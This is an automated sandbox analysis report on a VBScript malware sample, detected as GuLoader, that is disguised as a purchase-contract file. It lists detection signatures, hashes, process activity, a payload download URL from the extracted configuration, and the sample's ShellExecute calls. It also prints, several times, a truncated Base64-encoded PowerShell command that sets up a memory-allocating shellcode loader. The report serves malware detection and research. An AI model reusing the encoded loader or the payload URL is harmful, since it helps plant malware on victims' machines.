Windows Analysis Report
tregrene-KaufVertraeg-JoachimSvensson-23564334.vbs

Overview

General Information

Sample Name: tregrene-KaufVertraeg-JoachimSvensson-23564334.vbs
Analysis ID: 560422
MD5: b8fbb413a49b2f05872cb38372454664
SHA1: 2071d3476c94b3cfc924b31c705806e78df674a8
SHA256: cffa320db9834e3f224aa5961073fc9d0cb14f34c6430ffa2d7468da7da7ce32
Infos:

Detection

GuLoader
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Encrypted powershell cmdline option found
Very long command line found
C2 URLs / IPs found in malware configuration
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Sigma detected: Suspicious Execution of Powershell with Base64
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

AV Detection
barindex
Found malware configuration
Source: 00000005.00000002.893175053.00000000099B0000.00000040.00000800.00020000.00000000.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://cdn.discordapp.com/attachments/933089228261294143/9"}

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://cdn.discordapp.com/attachments/933089228261294143/9
Source: powershell.exe, 00000005.00000002.887747537.0000000008140000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000005.00000002.886939928.00000000063C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.877925546.0000000005566000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.876857673.0000000005361000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.877925546.0000000005566000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000005.00000002.886939928.00000000063C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.886939928.00000000063C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.886939928.00000000063C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000005.00000002.877925546.0000000005566000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000005.00000002.886939928.00000000063C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe

System Summary
barindex
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "IwBlAHIAaAB2AGUAcgB2AHMAawB1ACAATABlAGoAZQBzAHYAZQBuAGQAZQA5ACAAQQByAGMAaABhAGkAOAAgAFMAYQBnAHMAIABkAHIAbwBzAGgAawBpAGUAcwBoACAAbABhAG4AZABzAGsAYQAgAHcAaQB0AGMAaABiAGUAbAAgAEgAeQBkAHIAYQBuAHQAIABTAGMAdQBsAGwAcwBiAGEAIABhAGkAcgBiAHUAcgBzAHQAdQAgAHIAZQB0AHIAaQBiAHUAdABvACAAZABhAGcAcABhAGEAZgB1ACAAVQBQAFQASABSACAAbQBvAHIAcABpAG8AbgBmACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAGEAdAB1AHIAOQAsAGkAbgB0ACAAcwBlAHIAdQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAsAGkAbgB0ACAAYQBkAGoAdQAsAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAHMAZQByAHUANQAsAGkAbgB0ACAAcwBlAHIAdQA2ACwAaQBuAHQAIABzAGUAcgB1ADcALABpAG4AdAAgAHMAZQByAHUAOAAsAGkAbgB0ACAAcwBlAHIAdQA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHMAZQByAHUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAcwBlAHIAdQAyACwAaQBuAHQAIABzAGUAcgB1ADMAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAZgBlAHIAbgAgAEMAQQBNAFAASABJAFIARQAgAEYASgBFAEQAUgBFAE4AIABDAEEAUABTAEkAQwBJAE4AIABTAGMAYQByAGYAZQBkAGUAbgB0ACAASQBuAHQAZQA5ACAAQQBaAFkATQAgAEYASQBHAFUAUgAgAEEAZgBnAGkAZgB0AHMAbgAzACAAdQBuAHQAaABvAHIAbgBsACAAUwBhAHUAcwBzADMAIABOAE8ATABFACAASABlAGUAZABsAGUAcwBzAGIAIABNAEkATgBFAFIAQQAgAFYAaQBuAGQAZAByAGUAdgBlAHQAIABPAFAASABJAEQASQBPACAATQBBAEcATgBFAFQASQBTAEUAIABnAGEAbAB2ACAAbQBpAGwAdABlAG4AZQBzACAAWABFAE4ATwAgAEEAbABsAGUANQAgAG4AbwBuAG0AbwBuAGkAcwB0ACAAIAANAAoAJABTAFkARABZAEUATQBFAE4ASQBUADMAPQAwADsADQAKACQAUwBZAEQAWQBFAE0ARQBOAEkAVAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAFMAWQBEAFkARQBNAEUATgBJAFQAOAA9AFsAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAWQBEAFkARQBNAEUATgBJAFQAMwAsADAALABbAHIAZQBmAF0AJABTAFkARABZAEUATQBFAE4ASQBUADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAHQAZQBuAGYAPQAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAEMAbABpAHAAIgApAC4ATwBuAGUADQAKAA0ACgAkAFQAQQBMAEEAUgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAWw
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "IwBlAHIAaAB2AGUAcgB2AHMAawB1ACAATABlAGoAZQBzAHYAZQBuAGQAZQA5ACAAQQByAGMAaABhAGkAOAAgAFMAYQBnAHMAIABkAHIAbwBzAGgAawBpAGUAcwBoACAAbABhAG4AZABzAGsAYQAgAHcAaQB0AGMAaABiAGUAbAAgAEgAeQBkAHIAYQBuAHQAIABTAGMAdQBsAGwAcwBiAGEAIABhAGkAcgBiAHUAcgBzAHQAdQAgAHIAZQB0AHIAaQBiAHUAdABvACAAZABhAGcAcABhAGEAZgB1ACAAVQBQAFQASABSACAAbQBvAHIAcABpAG8AbgBmACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAGEAdAB1AHIAOQAsAGkAbgB0ACAAcwBlAHIAdQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAsAGkAbgB0ACAAYQBkAGoAdQAsAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAHMAZQByAHUANQAsAGkAbgB0ACAAcwBlAHIAdQA2ACwAaQBuAHQAIABzAGUAcgB1ADcALABpAG4AdAAgAHMAZQByAHUAOAAsAGkAbgB0ACAAcwBlAHIAdQA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHMAZQByAHUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAcwBlAHIAdQAyACwAaQBuAHQAIABzAGUAcgB1ADMAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAZgBlAHIAbgAgAEMAQQBNAFAASABJAFIARQAgAEYASgBFAEQAUgBFAE4AIABDAEEAUABTAEkAQwBJAE4AIABTAGMAYQByAGYAZQBkAGUAbgB0ACAASQBuAHQAZQA5ACAAQQBaAFkATQAgAEYASQBHAFUAUgAgAEEAZgBnAGkAZgB0AHMAbgAzACAAdQBuAHQAaABvAHIAbgBsACAAUwBhAHUAcwBzADMAIABOAE8ATABFACAASABlAGUAZABsAGUAcwBzAGIAIABNAEkATgBFAFIAQQAgAFYAaQBuAGQAZAByAGUAdgBlAHQAIABPAFAASABJAEQASQBPACAATQBBAEcATgBFAFQASQBTAEUAIABnAGEAbAB2ACAAbQBpAGwAdABlAG4AZQBzACAAWABFAE4ATwAgAEEAbABsAGUANQAgAG4AbwBuAG0AbwBuAGkAcwB0ACAAIAANAAoAJABTAFkARABZAEUATQBFAE4ASQBUADMAPQAwADsADQAKACQAUwBZAEQAWQBFAE0ARQBOAEkAVAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAFMAWQBEAFkARQBNAEUATgBJAFQAOAA9AFsAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAWQBEAFkARQBNAEUATgBJAFQAMwAsADAALABbAHIAZQBmAF0AJABTAFkARABZAEUATQBFAE4ASQBUADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAHQAZQBuAGYAPQAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAEMAbABpAHAAIgApAC4ATwBuAGUADQAKAA0ACgAkAFQAQQBMAEEAUgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAWw Jump to behavior
Potential malicious VBS script found (suspicious strings)
Source: Initial file: Intercompa.ShellExecute Numb5, "-NoExit -EncodedCommand " & chr(34) & Svine & chr(34), "", "", 0
Source: Initial file: Intercompa.ShellExecute Klagenspar, "-NoExit -EncodedCommand " & chr(34) & Svine & chr(34), "", "", 0
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 3956
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 3956 Jump to behavior
Detected potential crypto function
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_03272019 5_2_03272019
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_03271938 5_2_03271938
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_0327CE38 5_2_0327CE38
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_03272708 5_2_03272708
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_082CBB68 5_2_082CBB68
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_082CEBB0 5_2_082CEBB0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_082C7290 5_2_082C7290
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_082C5A30 5_2_082C5A30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_082C5A40 5_2_082C5A40
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process Stats: CPU usage > 98%
Java / VBScript file with very long strings (likely obfuscated code)
Source: tregrene-KaufVertraeg-JoachimSvensson-23564334.vbs Initial sample: Strings found which are bigger than 50
Tries to load missing DLLs
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\tregrene-KaufVertraeg-JoachimSvensson-23564334.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "IwBlAHIAaAB2AGUAcgB2AHMAawB1ACAATABlAGoAZQBzAHYAZQBuAGQAZQA5ACAAQQByAGMAaABhAGkAOAAgAFMAYQBnAHMAIABkAHIAbwBzAGgAawBpAGUAcwBoACAAbABhAG4AZABzAGsAYQAgAHcAaQB0AGMAaABiAGUAbAAgAEgAeQBkAHIAYQBuAHQAIABTAGMAdQBsAGwAcwBiAGEAIABhAGkAcgBiAHUAcgBzAHQAdQAgAHIAZQB0AHIAaQBiAHUAdABvACAAZABhAGcAcABhAGEAZgB1ACAAVQBQAFQASABSACAAbQBvAHIAcABpAG8AbgBmACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAGEAdAB1AHIAOQAsAGkAbgB0ACAAcwBlAHIAdQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAsAGkAbgB0ACAAYQBkAGoAdQAsAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAHMAZQByAHUANQAsAGkAbgB0ACAAcwBlAHIAdQA2ACwAaQBuAHQAIABzAGUAcgB1ADcALABpAG4AdAAgAHMAZQByAHUAOAAsAGkAbgB0ACAAcwBlAHIAdQA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHMAZQByAHUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAcwBlAHIAdQAyACwAaQBuAHQAIABzAGUAcgB1ADMAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAZgBlAHIAbgAgAEMAQQBNAFAASABJAFIARQAgAEYASgBFAEQAUgBFAE4AIABDAEEAUABTAEkAQwBJAE4AIABTAGMAYQByAGYAZQBkAGUAbgB0ACAASQBuAHQAZQA5ACAAQQBaAFkATQAgAEYASQBHAFUAUgAgAEEAZgBnAGkAZgB0AHMAbgAzACAAdQBuAHQAaABvAHIAbgBsACAAUwBhAHUAcwBzADMAIABOAE8ATABFACAASABlAGUAZABsAGUAcwBzAGIAIABNAEkATgBFAFIAQQAgAFYAaQBuAGQAZAByAGUAdgBlAHQAIABPAFAASABJAEQASQBPACAATQBBAEcATgBFAFQASQBTAEUAIABnAGEAbAB2ACAAbQBpAGwAdABlAG4AZQBzACAAWABFAE4ATwAgAEEAbABsAGUANQAgAG4AbwBuAG0AbwBuAGkAcwB0ACAAIAANAAoAJABTAFkARABZAEUATQBFAE4ASQBUADMAPQAwADsADQAKACQAUwBZAEQAWQBFAE0ARQBOAEkAVAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAFMAWQBEAFkARQBNAEUATgBJAFQAOAA9AFsAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAWQBEAFkARQBNAEUATgBJAFQAMwAsADAALABbAHIAZQBmAF0AJABTAFkARABZAEUATQBFAE4ASQBUADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAHQAZQBuAGYAPQAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAEMAbABpAHAAIgApAC4ATwBuAGUADQAKAA0ACgAkAFQAQQBMAEEAUgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAWw
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ejetful0\ejetful0.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA312.tmp" "c:\Users\user\AppData\Local\Temp\ejetful0\CSCD17B7A03BBAF4362BE5E7ED8FAA386CE.TMP"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "IwBlAHIAaAB2AGUAcgB2AHMAawB1ACAATABlAGoAZQBzAHYAZQBuAGQAZQA5ACAAQQByAGMAaABhAGkAOAAgAFMAYQBnAHMAIABkAHIAbwBzAGgAawBpAGUAcwBoACAAbABhAG4AZABzAGsAYQAgAHcAaQB0AGMAaABiAGUAbAAgAEgAeQBkAHIAYQBuAHQAIABTAGMAdQBsAGwAcwBiAGEAIABhAGkAcgBiAHUAcgBzAHQAdQAgAHIAZQB0AHIAaQBiAHUAdABvACAAZABhAGcAcABhAGEAZgB1ACAAVQBQAFQASABSACAAbQBvAHIAcABpAG8AbgBmACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAGEAdAB1AHIAOQAsAGkAbgB0ACAAcwBlAHIAdQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAsAGkAbgB0ACAAYQBkAGoAdQAsAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAHMAZQByAHUANQAsAGkAbgB0ACAAcwBlAHIAdQA2ACwAaQBuAHQAIABzAGUAcgB1ADcALABpAG4AdAAgAHMAZQByAHUAOAAsAGkAbgB0ACAAcwBlAHIAdQA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHMAZQByAHUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAcwBlAHIAdQAyACwAaQBuAHQAIABzAGUAcgB1ADMAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAZgBlAHIAbgAgAEMAQQBNAFAASABJAFIARQAgAEYASgBFAEQAUgBFAE4AIABDAEEAUABTAEkAQwBJAE4AIABTAGMAYQByAGYAZQBkAGUAbgB0ACAASQBuAHQAZQA5ACAAQQBaAFkATQAgAEYASQBHAFUAUgAgAEEAZgBnAGkAZgB0AHMAbgAzACAAdQBuAHQAaABvAHIAbgBsACAAUwBhAHUAcwBzADMAIABOAE8ATABFACAASABlAGUAZABsAGUAcwBzAGIAIABNAEkATgBFAFIAQQAgAFYAaQBuAGQAZAByAGUAdgBlAHQAIABPAFAASABJAEQASQBPACAATQBBAEcATgBFAFQASQBTAEUAIABnAGEAbAB2ACAAbQBpAGwAdABlAG4AZQBzACAAWABFAE4ATwAgAEEAbABsAGUANQAgAG4AbwBuAG0AbwBuAGkAcwB0ACAAIAANAAoAJABTAFkARABZAEUATQBFAE4ASQBUADMAPQAwADsADQAKACQAUwBZAEQAWQBFAE0ARQBOAEkAVAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAFMAWQBEAFkARQBNAEUATgBJAFQAOAA9AFsAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAWQBEAFkARQBNAEUATgBJAFQAMwAsADAALABbAHIAZQBmAF0AJABTAFkARABZAEUATQBFAE4ASQBUADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAHQAZQBuAGYAPQAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAEMAbABpAHAAIgApAC4ATwBuAGUADQAKAA0ACgAkAFQAQQBMAEEAUgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAWw Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ejetful0\ejetful0.cmdline Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA312.tmp" "c:\Users\user\AppData\Local\Temp\ejetful0\CSCD17B7A03BBAF4362BE5E7ED8FAA386CE.TMP" Jump to behavior
